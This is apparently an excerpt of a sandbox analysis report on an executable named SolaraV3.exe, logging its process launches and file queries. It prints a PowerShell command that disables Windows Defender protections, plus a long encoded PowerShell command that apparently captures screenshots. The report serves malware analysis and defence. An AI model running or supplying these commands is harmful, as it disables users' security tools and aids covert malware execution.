              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exeCode function: 110_2_00007FF74EEBB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,110_2_00007FF74EEBB340
              Source: C:\Users\user\Desktop\SolaraV3.exeCode function: 1_2_00007FF6DC729570 cpuid 1_2_00007FF6DC729570
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\libssl-1_1.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\sqlite3.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\VCRUNTIME140.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\Desktop\SolaraV3.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI28842 VolumeInformationJump to behavior
